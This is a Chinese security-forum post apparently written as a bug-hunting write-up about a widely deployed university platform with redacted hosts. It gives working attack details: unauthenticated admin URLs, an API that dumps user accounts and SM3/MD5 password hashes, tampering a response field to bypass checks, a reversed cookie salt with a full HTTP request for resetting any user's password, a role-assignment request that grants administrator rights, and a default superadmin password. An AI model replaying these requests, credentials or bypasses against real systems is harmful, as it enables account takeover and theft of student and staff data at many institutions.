某通用打包

江月   ·   发表于 2024-04-11 15:04:56   ·   技术文章

前言

部分涉及账号来源于此篇https://bbs.zkaq.cn/t/31591.html
后续不要说明来源地址和重置信息

统一垂直

账号1信息


报文


功能点补充

发展中心后台未授权访问

url地址:http://xxx.edu.cn:8080/center/login/admin#/
未授权访问admin权限

服务门户后台管理未授权 && 垂直

保持统一认证登录状态,访问url地址:http://xxx.edu.cn/heportal/admin.html#/
说明:部分站点需CAS AUTH字段
直通是未授权

数据治理未授权 && 垂直

http://xxx.edu.cn:8002/data-quality/index.html#/manager

统一未授权

这个点最开始未授权直通,接口来源于重置的接口跟接口即可
地址1:https://xxx.com/userCtl/getPage?name=admin&page=1&size=10
通过naem指定用户列出用户账号,密码(sm3)值


统一只有这个是国标sm3,其他的m5
补一个m5贴图

表单垂直

HTTP/1.1 200
P3P: CP=CAO PSA OUR
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, DELETE
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: *
Content-Type: application/json
Date: Sun, 26 Jun 2022 00:45:37 GMT
Connection: close
Server: any version you want
Content-Length: 45

{"success":true,"errmsg":null,"result":false}
修改result字段 false修改为:true

未授权敏感泄露

同站不同接口


接口地址:data-quality/index.html#/abnormal_pyzy

目标管理系统弱口令

目标管理系统任意重置


ck带salt,js逆向过混淆跟值可逆到salt值为:qualty
将cookie进行使用,密码是654321的md5值(注:在加密之前需要加一个quality,例如重置为654321,需要加密的即为quality654321)


重置接口:/quality/restPassword

POST /quality/resetPassword HTTP/1.1
Host: xxx
Content-Length: 65
Accept: application/json, text/plain, /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50
Application-Name: nbzl_admin
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=FEFFE823B92A9863550051F9D4C167CC
Connection: close

{"userId":"123","newpassword":"beab2c7769f424fd5ff0955b51f04dec"}

目标管理系统任意用户权限提升

需组合拳,任意重置配合使用

POST /quality/user/saveUserRoles HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Application-Name: nbzl_admin
Content-Length: 27
Connection: close
Cookie: JSESSIONID=FEFFE823B92A9863550051F9D4C167CC

{"id":"123","roleIds":"-2"}

roleids:-2是管理员id

目标管理系统任意删除

发展中心


同模板框架,上面目标管理系统该有的洞,这里都有 不多赘述

办事大厅

极少数有这个模块点

智慧教学

初始超级默认账密:admin/ABCDadmin
前缀ABCD 默认系统设置,可在系统管理中查看
部分站点存在后缀


这个是新旧两套系统
都是aes加密,需要js逆向拿iv 偏移量
通过aes可配置使用任意账号密码重置,这里的图丢失了

发展中心

可配和质管平台权限下发

写在最后

1、资产大概300+左右
2、每个子节点都是模块化设计,统一资产少,不代表资产就少
3、内网也挺多
SQL也很多,好多年前的 找不到了,将就看

打赏我,让我更有动力~

2 条回复   |  直到 5个月前 | 953 次浏览

小瑟斯
发表于 7个月前

666666,弱口令是什么

评论列表

  • 加载数据中...

编写评论内容

成风
发表于 5个月前

职业选手

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.